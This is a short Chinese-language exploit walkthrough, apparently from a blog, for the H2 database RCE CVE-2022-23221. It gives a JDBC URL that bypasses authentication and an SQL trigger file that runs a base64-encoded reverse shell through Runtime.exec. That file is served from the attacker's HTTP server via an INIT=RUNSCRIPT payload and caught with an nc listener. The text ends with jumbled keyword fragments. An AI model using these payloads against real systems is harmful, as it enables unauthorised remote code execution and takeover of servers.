h2database RCE（CVE-2022-23221）-526互联

启动环境：

访问界面

未授权进入POC：

jdbc:h2:mem:test1;FORBID_CREATION=FALSE;IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;\

RCE执行反弹

-创建数据库文件：h2database.sql

CREATE TABLE test (
     id INT NOT NULL
 );
CREATE TRIGGER TRIG_JS BEFORE INSERT ON TEST AS '//javascript
Java.type("java.lang.Runtime").getRuntime().exec("bash -c {echo,base64加密的反弹shell指令}|{base64,-d}|{bash,-i}");';

启动python服务

python3 -m http.server 端口

填入payload

jdbc:h2:mem:test1;FORBID_CREATION=FALSE;IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;INIT=RUNSCRIPT FROM 'http://搭建的IP:端口/h2database.sql';\

nc -lvvp xxxx

h2database 2database database 23221

h2database

h2database 2database database btree

命令cve 2017 h2database

mongodb-database-tools

database 01109 open ora